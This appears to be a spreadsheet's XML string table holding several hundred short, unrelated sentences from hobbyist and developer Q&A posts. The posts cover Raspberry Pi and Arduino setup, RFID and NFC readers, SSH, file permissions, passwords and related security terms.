    <t>When using the Identity Property on a column in a Sql database, values for the column are then assigned by Sql Server, and the assigned value can be returned using  or similar.</t>
  </si>
  <si>
    <t>Watchdog / watchdog timer is mechanism built-in in the system on hardware or software level can reset the system if serious problems are detected.</t>
  </si>
  <si>
    <t>A smartcard reader is a device that enables another device with comutational capabilities to communicate with smartcards (smartcard) or chip cards in general.</t>
  </si>
  <si>
    <t>You can store yout payment card data in the service, thus enabling online payments with the login.</t>
  </si>
  <si>
    <t>Devices may identify their location through a variety of means, including GPS, cell tower triangulation and WiFi network proximity detection.</t>
  </si>
  <si>
    <t>Contactless smart card (such as PayPass and payWave etc) are covered by ISO/IEC 14443; that describe the physical characteristics of the card, power and signal interfaces, transmission and collision detection, and transmission protocols.</t>
  </si>
  <si>
    <t>I initially assumed that you knew the code you were writing allowed anyone to pwn your server, however you 
present your permissions in a screen shot of the LXDE file manager 
write code with no error checking or reporting
provide no explanation what did happen and why it did not meet your expectations
have not checked your log files for any errors
did not provide a MCVE
makes me suspect this is not the case.</t>
  </si>
  <si>
    <t>I'd imagine I have to set it to login automatically to the user that node-red is running under (pi) but I have followed instructions to do that and the screen basically doesn't actually log in.</t>
  </si>
  <si>
    <t>I'm trying to set up a raspberry pi with the command  but I keep getting these messages:
I have a hunch that it has something to do with the fact that I previously ssh-ed into a different raspberry pi with the exact same hostname and username, but I don't know how to fix it so that I can access this one (and probably rename it to avoid this problem in the future).</t>
  </si>
  <si>
    <t>Either you copy the folder and avoid messing with permissions, or more easily just umount your sysroot, then use dd to dump the modified image to the very same physical partition you got it from.</t>
  </si>
  <si>
    <t>I got my Arduino Uno and happend yesterday to stop being recognised by the computer.The red led on the board works, so that's a good sign , but when i connect it via usb it doesn't notify me in the down-right side of screen that some device has connected.</t>
  </si>
  <si>
    <t>If you do not have a monitor or any way to view the desktop of your pi, you will have to do it the hard way by copying a file to your pi SD card to enable SSH, here is a link to a tutorial on how it works Enabling SSH on pi without screen
Honestly, though, the first option is the best, easiest and most foolproof.</t>
  </si>
  <si>
    <t>Okay, in last few hours I was trying to make a lock with arduino
-There are 4 buttons, each one has number (1,2,3,4)
-you have 8 spaces for code
So I started with function that will change the password.</t>
  </si>
  <si>
    <t>CognitoCachingCredentialsProvider credentialsProvider = new 
CognitoCachingCredentialsProvider(context, IDENTITY_POOL_ID, REGION);
credentialsProvider.setLogins(logins);
and
AmazonCognitoIdentity cognitoIdentity = new AmazonCognitoIdentityClient(credentialsProvider);
GetIdRequest getIdReq = new GetIdRequest();
getIdReq.setLogins(logins); //or if you have already set provider logins just use credentialsProvider.getLogins()
getIdReq.setIdentityPoolId(COGNITO_POOL_ID);
GetIdResult getIdRes = cognitoIdentity.getId(getIdReq);
after that you still nedd to make some call
AttachPrincipalPolicyRequest attachPolicyReq = new AttachPrincipalPolicyRequest(); //in docs it called AttachPolicyRequest but it`s wrong
attachPolicyReq.setPolicyName("allAllowed"); //name of your IOTAWS policy
attachPolicyReq.setPrincipal(getIdRes.getIdentityId());
new AWSIotClient(credentialsProvider).attachPrincipalPolicy(attachPolicyReq);
and only after that you can enable connect button and continue like that
mqttManager.connect(credentialsProvider, new AWSIotMqttClientStatusCallback() {
Really for this small piece of code i spent a lot of time...</t>
  </si>
  <si>
    <t>I realize this question has already been asked in some different ways, however it doesn't seem like any of the ways I've come across have worked to fix this problem, so here it goes:
I'm trying to connect to my raspberry pi 3 raspbian setup via ssh on my laptop, but although I have the correct ip address, I keep getting the error: 
This is unusual because when I try to ping that address, it works fine.</t>
  </si>
  <si>
    <t>Whatever you use, make sure the + character is encoded into %2b.</t>
  </si>
  <si>
    <t>Once we do that, the idea is that you will be able to fetch all game data for the authenticated user and his friends, which is the same behavior as the in-game match history and the match history website (http://matchhistory.na.leagueoflegends.com).</t>
  </si>
  <si>
    <t>isDenied bool: 0
isDenied bool: 0
isDenied bool: 0
isDenied bool: 0
isDenied bool: 0
isDenied bool: 0
Scanned PICC's UID on reader 1:
F539A76B
isDenied bool: 54
ip=10.10.1.50&amp;passcode=&amp;rfid=f539a76b
connecting...Connected
disconnecting.</t>
  </si>
  <si>
    <t>Sounds like you have the correct certs/keys in place.</t>
  </si>
  <si>
    <t>Here is one example that is good for starters to understand how RFID scanning works.</t>
  </si>
  <si>
    <t>The iPad Mini 3 is like the Mini 2 but with a Touch Id fingerprint scanner.</t>
  </si>
  <si>
    <t>For NFC, if you check this thread, both answers seem to have some good starting information on how you could potentially get a tokenized account number from Apple Pay if you hook up an NFC reader to the Pi.</t>
  </si>
  <si>
    <t>I have a NodeMCU esp8266 wired to an RFID-RC522 and I'm trying to get it to activate a command when a certain card is scanned.</t>
  </si>
  <si>
    <t>In progressive JPEG images, components are encoded in multiple scans.</t>
  </si>
  <si>
    <t>When I went into the file i had accidentally placed eth0 as eth1 I changed it back to eth0 and it worked great.</t>
  </si>
  <si>
    <t>Then I hit enter to continue the WiFi Shield firmware update.</t>
  </si>
  <si>
    <t>With the newest api (2.1.0), from what I can work out it seems that the place to put the certs folder has changed.</t>
  </si>
  <si>
    <t>I conclude that the error was possibly due to corrupted data on a bad SD card.</t>
  </si>
  <si>
    <t>SJSXP's XML token scanner is based on Xerces 2 but has been modified to accomodate the new pull model.</t>
  </si>
  <si>
    <t>When I try to connect to nodeMCUwifi using my smartphone (just to test the connection, I have no intention of using this system for heavy internet load, only MQTT messages) I get a message "authentication error occured" even though I  have typed the password correctly, or (in rarer cases)it connects but disconnects immediately.</t>
  </si>
  <si>
    <t>From research, a lot of people have suggested that the object file might be corrupted.</t>
  </si>
  <si>
    <t>Incidentally, I tried to use the VNC Viewer iPhone app and got my Raspberry Pi 2 hijacked when I loaded the required software onto the RPi2 requiring me to get a new SD card.</t>
  </si>
  <si>
    <t>I also was wondering if it was possible to scan the NFC tag and take the user to an log in screen to unlock your computer</t>
  </si>
  <si>
    <t>Developers recomend running the app into a beaglebone black board using an image based in Ubuntu 14.04 LTS with kernel 3.8
With this image I experience network stability problems and I found the more recent official beaglebone image based in debian 9.5 with kernel 4.14 much more reliable.</t>
  </si>
  <si>
    <t>To make sure the password is set correctly, I also used
GSEC&gt; modify SYSDBA -pw masterkey
with root privileges.</t>
  </si>
  <si>
    <t>i've figured out the sounds pretty good and got that working but cant figure out how to program the combination lock.</t>
  </si>
  <si>
    <t>be able to show a list of scanned wifi networks and let the user pick one and type in a password.</t>
  </si>
  <si>
    <t>I could probably get away with it if I set the detection thresholds to huge values but I want the keypresses and detection to happen very quickly (all within 100 milliseconds per key event).</t>
  </si>
  <si>
    <t>fanotify is intended to provide an interface for on access file scanning and permissions gating based on the results of those scans.</t>
  </si>
  <si>
    <t>I tried to modify settings.path from preferences.txt in Arduino folder thinking the problem was related permissions but it did not work.</t>
  </si>
  <si>
    <t>First I tried to connect to another network, I used hotspot on my Android phone, with WPA2 and simple SSID/Password without any spaces or strange characters just to be sure.</t>
  </si>
  <si>
    <t>A big proportion of currently use passwords are insecure and can be relatively easily guessed (empty, same as username, date of birth, etc).</t>
  </si>
  <si>
    <t>If I change SSID and password to connect to the Apple hotspot the  loop runs forever (see code, I'm using Arduino IDE 1.8.2):
To check things out I used the NodeMCU to scan for wifi networks and got my Apple hotspot listed (also using WPA2) so the board can "see" it.</t>
  </si>
  <si>
    <t>Why a hash table may be unnecessary
Usually in such situations there is no need for a string key, since the key is visible only inside your code, and the key is not interacted with from outside your program.</t>
  </si>
  <si>
    <t>If (even accidentally) you try to erroneously connect a device as a gateway (or vice versa), the whole thing gets messed up...:
You cannot re-connect the device/gateway, even if you go back and correct the credentials (i.e.</t>
  </si>
  <si>
    <t>If you adjust your capabilities, you should be prepared for any number of the variants requiring you to display a PIN for the mobile device to enter.</t>
  </si>
  <si>
    <t>Such images are common in object detection, edge detection, object counting etc.</t>
  </si>
  <si>
    <t>The interface should not rely on a particular behavior for this key unless the issue is forced by observing the keypress event for presses of the Enter key.</t>
  </si>
  <si>
    <t>The architecture makes no promises about what's in the caches/TLBs out of reset, and even if it did you don't know what the bootloader might have left hanging around, so it's up to you to make sure there are no stale entries (or uninitialised junk which just happens to look valid) present before turning the MMU on:
Data cache invalidation is considerably more involved, but since you have everything non-cacheable here I'm going to hope that that's a problem for the future, and just wave in the general direction of some existing code.</t>
  </si>
  <si>
    <t>My understanding (more like a guess) is that for some reason the COM port will not open when called from the web browser (maybe security issue?).</t>
  </si>
  <si>
    <t>Waiting for card...
Card found
Card is valid
User identified as :1534
Thread started...</t>
  </si>
  <si>
    <t>I had a similar problem when i built the same program on android, and it was solved when i added the internet permission to the manifest.</t>
  </si>
  <si>
    <t>If one says the phone is present but the other doesn't, then it sends the necessary HTTP request to arm or disarm the motion detection on the webcam.</t>
  </si>
  <si>
    <t>With some small changed i also managed to cycle it through several tabs using the command  
Now i want to display the jira status, on startup i need chromium to login and then display the status.</t>
  </si>
  <si>
    <t>The task is to read a rfid card and to send its unique id number to a webpage (coded in php) which stores the data in a database.</t>
  </si>
  <si>
    <t>It's your basic surveillance camera setup... central linux server with lots of storage space, remote IP cameras, etc.</t>
  </si>
  <si>
    <t>One is AVR PIC F Arduino Sensitive Audio Sound Microphone Mic Sensor Detection Module, another is just a different brand comes with Arduino kit.</t>
  </si>
  <si>
    <t>I am using Raspberry Pi 3 with default image
Linux raspberrypi 4.9.59-v7+ #1047 SMP Sun Oct 29 12:19:23 GMT 2017 armv7l GNU/Linux
I Cloned repository from github ibmwatson-iot and as per instruction installed required libs, tried to build with steps below
Now I am getting linking error for crypto and ssl libs as below, what could be the problem?</t>
  </si>
  <si>
    <t>At first boot, the system-setup screen appears and i can set a root password and also create a new user (without password for testing).</t>
  </si>
  <si>
    <t>The network medium I am using is a wireless hot-spot on my phone, but this to date hasn't caused any issues with preventing communication between my laptop and my Pi.</t>
  </si>
  <si>
    <t>In smart WiFi Plug, when adding new device using the mobile App, how the mobile app send the wifi Credentials of the network that I'm connected to to the smart wifi plug so that then the smart plug will be controlled from the mobile App?</t>
  </si>
  <si>
    <t>I want to know what is the mechanism what's happening in the background when adding new device and how the Smart plug gets the wifi credentials of my local network.</t>
  </si>
  <si>
    <t>Actually, most probably they will sooner simply run out of space, and the guarding mechanisms will raise relevant hardware of software exceptions.</t>
  </si>
  <si>
    <t>Also, if garbage characters are going to screw up your program really badly you might want to think about creating some kind of crude checksum also to confirm the correct transmission.</t>
  </si>
  <si>
    <t>With further research i saw that my barcode scanner is treated as a standard input device(keyboard) and the driver is already supported by my Raspi.</t>
  </si>
  <si>
    <t>possibly the message is not correct
If it says not root, but the correct user, then the problem is in setting your PS1 environment variable.</t>
  </si>
  <si>
    <t>Few steps which might help narrowing the issue down:
 1. try ssh 127.0.0.1 from raspberry pi itself - if it does not work it is probably some SSH issue on rpi (maybe it is disabled in raspi config - in the past it was disabled by default?)</t>
  </si>
  <si>
    <t>Despite the fact that you asked this question few months ago, .NET Framework source codes have been opened to public community by Microsoft.</t>
  </si>
  <si>
    <t>Tools &gt; Deployment &gt; Add &gt; Enter name and SFTP &gt; 
Enter host, port, root path (I said "/" without quotes) username and password.</t>
  </si>
  <si>
    <t>However sending information over RF24 causes enough delays that characters are dropped or corrupted by SoftwareSerial, and this assumption no longer holds.</t>
  </si>
  <si>
    <t>This is a major issue, as this effectively renders the encryption useless and your password is being transmitted alike to being plaintext and anyone can sniff it.</t>
  </si>
  <si>
    <t>After entering the page with a browser from PC, you need to enter PIN - it will be generated by your phone (tap Pair in Device discovery).</t>
  </si>
  <si>
    <t>Latest firmware update will display a warning symbol in top right of display when this is detected.</t>
  </si>
  <si>
    <t>It needed to be usable in typing a complex password, so it sports keys for lower- and uppercase letters, numerals and (most) symbols a regular keyboard supports.</t>
  </si>
  <si>
    <t>Encoded string without salt is easy to decode, some encoding methods are easy to spot and can be decoded by anyone.</t>
  </si>
  <si>
    <t>Generally root user is blocked (I guess not your problem), I would set up another user for this or change sshd config.</t>
  </si>
  <si>
    <t>If an interrupt happens at just the wrong time you'll corrupt the list structure unless you lock out interrupts when you manipulate or traverse it.</t>
  </si>
  <si>
    <t>URL Encoding is a mechanism for encoding information in a Uniform Resource Identifier (URI) under certain circumstances.</t>
  </si>
  <si>
    <t>It includes theft of passwords, credit card numbers, bank account details and other confidential information.</t>
  </si>
  <si>
    <t>XXTEA (corrected block TEA) is the third version of the Tiny Encryption Algorithm (TEA), designed to correct security weaknesses of previous TEA implementations.</t>
  </si>
  <si>
    <t>The user registers their device to the online service by selecting a local authentication mechanism such as swiping a finger, looking at the camera, speaking into the mic, entering a PIN, etc.</t>
  </si>
  <si>
    <t>Java Card refers to a technology that allows Java-dd applications (applets) to be run securely on smart cards and similar small memory footprint devices.</t>
  </si>
  <si>
    <t>Hidden fields should never be used to store sensitive information like passwords or credit card information.</t>
  </si>
  <si>
    <t>First Data E4 API is global Credit Card transaction API Deals with  Purchase 2) Pre-Authorization 3) Refund 4)Void</t>
  </si>
  <si>
    <t>It requires the network to identify the Base Transceiver Station (BTS; essentially the cell tower to which the device is connected at the time) to which the cell phone is communicating and the location of that BTS.</t>
  </si>
  <si>
    <t>Google Trusted Stores is a Google program which offers purchase protection, merchant ratings and reviews, and merchant verification to e-commerce shops.</t>
  </si>
  <si>
    <t>It allows users to share data through NFC tags and NFC peer-to-peer communication between 2 devices and, in some regions, to use their device as a contactless payment card.</t>
  </si>
  <si>
    <t>Magnetic Ink Character Recognition, or MICR, is a character recognition technology used primarily by the banking industry to facilitate the processing of cheques.</t>
  </si>
  <si>
    <t>ionCube lets you encode your PHP files up to PHP 5.5
To encode files, you need to buy ionCube PHP Encoder (it's a commercial tool) and to use encoded files you need to have ionCube loaders installed (those are for free).</t>
  </si>
  <si>
    <t>I've tried 
    ssh &lt;&lt; EOF
etc... // but different computers require different passwords that aren't stored in the (unmodified) scripts and ssh does prompt for passwords and I am not permitted to change this configuration.</t>
  </si>
  <si>
    <t>And then updating the password using:
$ ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'new-password';
Once this is done stop and start the mysql server.</t>
  </si>
  <si>
    <t>To find and change the current fingerprint:
Go to https://www.grc.com/fingerprints.htm
Enter "test.firebaseio.com"
Record the fingerprint (e.g.</t>
  </si>
  <si>
    <t>The sound to encapsulate the payload must have excellent recognisability
The sound must be extremely unlikely to be contained in any "normal" phone sound
the receiving board must have good discrimination against "wrong" frequencies
The above properties reduce the achievable bandwidth to a few baud
Additionally, sinve the connection is simplex, you should consider idempotency and send every command twice or more to increase reliability.</t>
  </si>
  <si>
    <t>Guessing it's to do with either a path or permissions issue but search through stack overflow and the raspberry pi forums but can't find a solution, most likely due to my lack of knowledge on the raspbian OS.</t>
  </si>
  <si>
    <t>Next step is to mount root: 
mount -rw -o remount /
Then run below command for pi user, type desired NEW password:
passwd pi
Next two more commands:
sync
exec /sbin/init
Probably the screen will go black, if so, wait few minutes then turn it off.</t>
  </si>
  <si>
    <t>Our security team will respond to confirm receipt of your message, review and plan the mitigation of the issue appropriately, as well as set a timeline for a new release or patch and will also make sure you are given credit for the discovery.</t>
  </si>
  <si>
    <t>Check permission on Ubuntu image.</t>
  </si>
  <si>
    <t>You might need to fsck it, and see if other files have been damaged, or do a badblocks check or similar.</t>
  </si>
  <si>
    <t>Only problem I have now is that I never realized that the msg was encoded and I'm quite lost now.</t>
  </si>
  <si>
    <t>A good hint is if the password contains lots of unprintable chars, as the one above does, then it's likely the secret between the RADIUS server and the NAS is incorrect.</t>
  </si>
  <si>
    <t>Although some errors may not show up, my impression is that bad username or password errors would appear.</t>
  </si>
  <si>
    <t>A file that is normally not visible for the user, unless the user requires to show the hidden files.</t>
  </si>
  <si>
    <t>I have recently turned my Raspberry to a web server, which could be connected via SSH from either outside or inside the network.</t>
  </si>
  <si>
    <t>My first idea was to make a page where the user can access via IP and log in, but any suggestions are very welcomed.</t>
  </si>
  <si>
    <t>, or as visualized: , is the browsers's way of showing you the character in the string is an invalid character.</t>
  </si>
  <si>
    <t>"I'm setting up a rfid reader using arduino uno and rfid reader , i have success in reading a specific block in the rfid card but after i read the serial for new ID for changing it this error occurs 
block was read
1011
// AFTER TYPING IN SERIAL
PCD_Authenticate() failed: Timeout in communication.
"</t>
  </si>
  <si>
    <t>digitalWrite(ledVCC, HIGH);
    wdt_reset();
    // Turn servo to 170 degrees to unlock the door.</t>
  </si>
  <si>
    <t>If RFID works, then fingerprint doesn't even blink and if Fingerprint works, RFID doesn't read.</t>
  </si>
  <si>
    <t>Then, the idea is to take those values from the encrypted_message variable and enter it in a char array:
char cifrado[300]
that has those same values, but in this case in character type.</t>
  </si>
  <si>
    <t>I need to write a python script which automatically scan for WiFi networks and a connection need to be automatically established with known SSID and password.</t>
  </si>
  <si>
    <t>I want to able to see the interface of the pi on the projector connected to the pi or, if I can only run applications and see on the projector then, set up the VNC on my terminal and be able to login on the screen showing on my projector:
My IP address is 192.168.2.2
Debian GNU/Linux 7.0 raspberrypi tty1
raspberrypi login: _
Please tell me what I can do, I have tried looking on Google/SO but haven't been successful.</t>
  </si>
  <si>
    <t>However, having so many of device B firing advertisements like this causes the pi to sometimes completely stall, I believe due to a corrupted connection due to interference.</t>
  </si>
  <si>
    <t>Everything is fine if Spring Security is turned off, but if I turn on Security I getting followed error:
How to fix
Do anyone know where is the problem?</t>
  </si>
  <si>
    <t>A virtual machine with ubuntu helped mounting everything, but I could only mount it successfully with read permissions.</t>
  </si>
  <si>
    <t>the logfiles)
Note: It's pretty easy to get wrong permissions of generated files, if you run the file-creating process under a wrong user (only once is enough - e.g.</t>
  </si>
  <si>
    <t>Face API is a cloud-based service that provides advanced algorithm for face detection, verification, identification, and more.</t>
  </si>
  <si>
    <t>In cryptanalysis and computer security, password recovery is the process of recovering passwords from data that have been stored in or transmitted by a computer system.</t>
  </si>
  <si>
    <t>So in that sense, it is different from plain text box control which can optionally show masked characters if configured that way.</t>
  </si>
  <si>
    <t>Then the button should be able to trigger a bash script to capture the image, and another button to run a python script with OpenCV that will do edge detection and output to the front-end the image after process.</t>
  </si>
  <si>
    <t>After running smoothly doing what it should, sometimes for minutes sometimes for hours, the cameras attached are not found anymore by V4L or putting out corrupted information.</t>
  </si>
  <si>
    <t>The code that we are using to receive the unique-code from the hardware :
The code uses Android USB Host API
What I expect to see:
The data received from the hardware device should be stored in the byte array.</t>
  </si>
  <si>
    <t>Collecting RPi.GPIO
  Could not fetch URL https://pypi.python.org/simple/rpi-gpio/: There was a problem confirming the ssl certificate: Can't connect to HTTPS URL because the SSL module is not available.</t>
  </si>
  <si>
    <t>The code should be something like this:
The  file should look like this, one phrase per line with threshold
open the door /1e-40/
close the door /1e-40/
how are you /1e-30/
Thresholds must be tuned for every keyphrase to balance between false alarms and misdetections.</t>
  </si>
  <si>
    <t>An APDU is used to communicate with smart cards and Subscriber Identity Modules (SIMs) conforming to standard ISO/IEC 7816-4.</t>
  </si>
  <si>
    <t>Smart Lock for Passwords can be integrated into an Android app, allowing user to automatically sign using the credentials they have saved.</t>
  </si>
  <si>
    <t>Created to attempt to alleviate problems caused by DLLs, such as version conflicts, missing DLLs, duplicate DLLs, and incorrect or missing registration.</t>
  </si>
  <si>
    <t>It is a open source collection of algorithms commonly used to solve medical image registration problems.</t>
  </si>
  <si>
    <t>The following thread discusses workarounds for this issue:
rvm installation not working: "RVM is not a function"
One solution would be to start the terminal in "login mode" by doing /bin/bash --login, but this does not help on Raspbian because it uses LXTerminal.</t>
  </si>
  <si>
    <t>I used default username and password for ssh connection
After including large mysql database ssh disconected and now, when i try to log in, raspberry display me error message :" Error, access is denied!"</t>
  </si>
  <si>
    <t>I have not dealt much with Ubuntu permissions or ports in general, please help me find and upload any other information that you may need in order to help me solve this problem.</t>
  </si>
  <si>
    <t>Unfortunately, when calling  this returns:
This suggests that the hardware can't be accessed form the container...
Also trying to run the container in --privileged mode doesn't solve the problem.</t>
  </si>
  <si>
    <t>You could simply write your own or use a library like Polly.Net
In a distributed world connectivity issues should be expected, so I don't think there is any problem with your code other than is should be more resilient.</t>
  </si>
  <si>
    <t>It includes testing for common SSL certificate verification issues, HTTPS and TLS/SSL library bugs, SSL and STARTTLS stripping issues, cleartext issues, and more.</t>
  </si>
  <si>
    <t>XXTEA (corrected block TEA) is the third version of the Tiny Encryption Algorithm (TEA), designed to correct security weaknesses of previous TEA implementations (TEA, XTEA).</t>
  </si>
  <si>
    <t>The problem is that I can only SSH into one Operating System given that my  only recognises one key per host, so I would have to delete each time the known_hosts entry whenever the Operating System/SD card changes.</t>
  </si>
  <si>
    <t>So I had to convert the id_dsa private key generated by eclipse to a  PuTTY Private Key File, which resolved that issue, after launching EGit again, I first thought it would work, but oh no!</t>
  </si>
  <si>
    <t>The credentials to my database is as follows: 
Address: localhost
Port: 1521
User: student
Password: test
Scheme: STUDENT
Table Name: EMP</t>
  </si>
  <si>
    <t>Im working on a raspberry pi and I secured my node red by watching this vid https://www.youtube.com/watch?v=z9a_ztJqaII
Im trying to use google action on my node red, and it required SSL Certificate and SSL Privatekey which should be in .crt and .key format I tried converting the Certificate.pem and privatekey.pem to .crt and .key respectively  but anytime I deploy my node I get this
Which I believe its because the node cant read my .crt and .key files.</t>
  </si>
  <si>
    <t>The relevant settings from the link above seem to be:
"createOptions": "{\"HostConfig\":{\"Privileged\": true}}"
and commenting out the following lines in Dockerfile.arm32v7:
#RUN useradd -ms /bin/bash moduleuser
#USER moduleuser
I am not sure what else to change to allow the code from the container access the hardware...</t>
  </si>
  <si>
    <t>I expose my problem:
We have this:
where we get the following information once we perform the AES algorithm, that is, they are not fixed values, but change with each execution of the program:
encrypted_message = "AEF32344ABCD"
(This above is an example, it's not the actual values.)</t>
  </si>
  <si>
    <t>I tried eliminating noise by using shielded wire, only using about 12" or so of wire between the Raspberry Pi and the button, and even including a Resistor-Capacitor circuit to the loop as an attempt to "hardware debounce" the button.</t>
  </si>
  <si>
    <t>I was getting undefined identifier errors (for SPCR, SPE, MSTR, SPR1, SPR0) due to not being able to pass the -mmcu=somechipname as a flag to the compiler, which caused no device to be defined and avr/io.h to be unable to include the file that defined those symbols.</t>
  </si>
  <si>
    <t>Ethernet or GPS)
Mains electricity smart meter via ZigBee (I'm interested now that smart meters are being introduced in Victoria, Australia; not sure if the smart meters broadcast the time info though, and whether it requires authentication)
Metronome
Instrument tuner</t>
  </si>
  <si>
    <t>I solved the issue by using the following  method implementation:
Using this method a valid EGL configuration is correctly found.</t>
  </si>
  <si>
    <t>Since you (probably) aren't expecting the page to change, you could hard code it to be something like this:
Once you send that payload, you should receive your secondary  user/password page.</t>
  </si>
  <si>
    <t>You can always do debouncing in the hardware
I've encountered bounce several times with buttons and encoders, and doing debouncing in the software can get messy and lead to unreadable code or logic errors.</t>
  </si>
  <si>
    <t>With the Smart Lock for Passwords API, you can programmatically save and retrieve credentials, and automatically sign users in across devices and websites in Chrome.</t>
  </si>
  <si>
    <t>If you choose so, Machine.Fakes even helps you to stay mostly independent of a concrete fake framework by providing a little wrapper API and a provider model for fake frameworks.</t>
  </si>
  <si>
    <t>Please do NOT ask how to "hack", pirate, or otherwise work around a legitimate copy protection or licensing scheme put in place by the original developer.</t>
  </si>
  <si>
    <t>Eddystone is based on Ephemeral Identifiers (EIDs) that change frequently, and allow only authorized clients to decode them 
Benefits: 
Better semantic context and 
Precise location.</t>
  </si>
  <si>
    <t>The Subscriber synchronizes with the Publisher when connected to the network and exchanges all rows that have changed between the Publisher and Subscriber since the last time synchronization occurred.</t>
  </si>
  <si>
    <t>Due to the number of devices that need to be controlled and monitored rather than purchasing additional Raspberry PIs I decided to go with a GPIO port expander and make use of the existing Raspberry PI hardware.</t>
  </si>
  <si>
    <t>Having problem with camera permission for android things, when I try to Run the simple OpenCV application, this message is shown "It seems that you device does not support camera (or it is locked), Application will be closed.</t>
  </si>
  <si>
    <t>For security reasons, it is best for each user to have their own temporary directory, since there has been a history of security vulnerabilities with temporary files due to programs incorrect file permissions or race conditions.</t>
  </si>
  <si>
    <t>(I have tried changing it at the broker, but that didn't help)
If the MQTT.fx client is able to connect using the same credentials, am I (in the ESP8266 case) putting the information forward at the wrong time, or could it be the wrong information?</t>
  </si>
  <si>
    <t>(works ok for my linux test, i do not know is there a diferences in osx)
First problem here is that cat will not lock device exclusive, and keyboard will send keystrokes to both comps... and second problem is that it will need time to make and configure some usefull scripts arround it.</t>
  </si>
  <si>
    <t>The main purpose of a single sign-on system is to reduce the number of times a user has to enter their login details, usually username and password.</t>
  </si>
  <si>
    <t>This fixed the problem:
Browse to
https://console.aws.amazon.com/iam/home?region=us-west-2#security_credential
and then if you dont have a key click on create new access key and
if you already have it save the information and enter it in front of
entries of  command and also for region select
us-west-2 is Oregon is selected in your dashboard.</t>
  </si>
  <si>
    <t>Biometric recognition is the process of recognizing a person's identity by analyzing some data derived from their body (physical traits, like fingerprint, iris or face) or behaviour (like gait or, to some extent, voice).</t>
  </si>
  <si>
    <t>There were breaking changes... and these changes are now of the nature that my previous over-air-update scheme no longer works even if I modify it -- there are security "fixes" that break my current approach and I see now way to salvage it yet.</t>
  </si>
  <si>
    <t>I could guess its something to do with permissions but I dont know how I would fix it.</t>
  </si>
  <si>
    <t>Here is my pseudocode, please tell me if you see something wrong, or something that I should change, thus far this is only the pseudocode for the RPi Camera module, not the NoIR.</t>
  </si>
  <si>
    <t>I've seen so far some application fourms done in VB to do Face recognition.</t>
  </si>
  <si>
    <t>So far I have tried changing folder permissions so that the user pi owns everything.</t>
  </si>
  <si>
    <t>Any suggestions for decoding?</t>
  </si>
  <si>
    <t>Two datapoints per minute work, so API key, etc is not an issue.</t>
  </si>
  <si>
    <t>However, the command after this is where I need to change the password.</t>
  </si>
  <si>
    <t>Do I have any way of fixing the problem if I can't login?</t>
  </si>
  <si>
    <t>I confirm i can login to my Raspberry Pi using Putty without password.</t>
  </si>
  <si>
    <t>I've tried chmod on the folder, but the permissions don't actually change.</t>
  </si>
  <si>
    <t>I think that the Sim-Card cannot be unlocked.</t>
  </si>
  <si>
    <t>The password I entered is correct.</t>
  </si>
  <si>
    <t>So the problem is actually not caused by code, but by SSH.</t>
  </si>
  <si>
    <t>I am trying to use a keypad to enter a password.</t>
  </si>
  <si>
    <t>I want to run a fake SMTP server on my raspberry PI (rpi).</t>
  </si>
  <si>
    <t>The problem is, a have code 0x00 somewhere in passphrase.</t>
  </si>
  <si>
    <t>It's not passphrase, it's PSK with 64 hexadecimal characters, and it doesn't want to connect.</t>
  </si>
  <si>
    <t>I have also tried to reset the WIFI using the WIFI reset button but that seems not to work.</t>
  </si>
  <si>
    <t>However, my device (DVR) needs to run 24/7 and the user cannot regularly enter the password.</t>
  </si>
  <si>
    <t>Could it corrupt the SD-card?</t>
  </si>
  <si>
    <t>I did face recognition application, but it works very slowly.</t>
  </si>
  <si>
    <t>I am using the admin user with the correct password.</t>
  </si>
  <si>
    <t>Changed permissions for folders www,html,sm.</t>
  </si>
  <si>
    <t>I have 9 buttons to enter a code.</t>
  </si>
  <si>
    <t>Lately I dismantled an old and broken barcode scanner (Datalogic PM8500).</t>
  </si>
  <si>
    <t>I have to use my phone to unlock a door.</t>
  </si>
  <si>
    <t>Is this a file permission issue or a stdout/GUI issue?</t>
  </si>
  <si>
    <t>I am relatively new to this and am using PuTTY to SSH.</t>
  </si>
  <si>
    <t>The problem is that in my student dorm they use 802.1X as network authentication.</t>
  </si>
  <si>
    <t>Won't do that, thats simply too much of a hack.</t>
  </si>
  <si>
    <t>Seems like some access issue but not sure how to solve it?</t>
  </si>
  <si>
    <t>I guess it's a permission handing issue on Docker on Windows.</t>
  </si>
  <si>
    <t>I tried the default password and the one I changed it to.</t>
  </si>
  <si>
    <t>Where the application would do face detection.</t>
  </si>
  <si>
    <t>Something went wrong: Cannot decode data Please try again.</t>
  </si>
  <si>
    <t>Command to provide permission : sudo chmod a+rw /dev/rfcomm0
So giving the permission to /dev/rfcomm0 solved the problem for me.</t>
  </si>
  <si>
    <t>But there is another dirty hack to do this.</t>
  </si>
  <si>
    <t>Now you will be able to rn ssh pi@pi_addr without enter a password.</t>
  </si>
  <si>
    <t>The defaults are
USER:pi
  PASSWORD:raspberry
If you have changed your password use the new password.</t>
  </si>
  <si>
    <t>I changed the code of lockDoor() and unlockDoor() to this:
Thanks for trying to help anyways, I'm sure I'll come across other problems later on.</t>
  </si>
  <si>
    <t>Unless someone solves this the RIGHT way, this is hack I've done.</t>
  </si>
  <si>
    <t>The issue is with wrong permissions.</t>
  </si>
  <si>
    <t>The problem is that the barcode scanner is pretending to be a keyboard.</t>
  </si>
  <si>
    <t>And enter is also a character.</t>
  </si>
  <si>
    <t>To access you're server simply enter ip_of_Rpi/~pi_username.</t>
  </si>
  <si>
    <t>From what I can tell the NAK simply means that the wrong key was used or maybe no key.</t>
  </si>
  <si>
    <t>This sounds a lot like a permissions error.</t>
  </si>
  <si>
    <t>More than likely the card was corrupted or damaged</t>
  </si>
  <si>
    <t>Sounds like a file permissions issue.</t>
  </si>
  <si>
    <t>This will only work if there is no fancy authentication at the router/dhcp, if there is, you may need to look further to solve this issue.</t>
  </si>
  <si>
    <t>Simply change this to the login name you use when you normally ssh into the Raspberry Pi.</t>
  </si>
  <si>
    <t>I have heard that the Raspberry has a very flawed USB firmware blob - but had never encountered it, until now.</t>
  </si>
  <si>
    <t>For the second issue; There's an authentication issue.</t>
  </si>
  <si>
    <t>there is also some issue with fake kms or kms.</t>
  </si>
  <si>
    <t>Rightly so, as certificate issues aren't really something to mess around with, even if they are just benign.</t>
  </si>
  <si>
    <t>If not, then mysql -uroot would get into mysql without a password.</t>
  </si>
  <si>
    <t>By default I hope not, or else it would be a security issue.</t>
  </si>
  <si>
    <t>The soft keyboard worked again after unplugging the device.</t>
  </si>
  <si>
    <t>For connecting anonymously I experienced issues.</t>
  </si>
  <si>
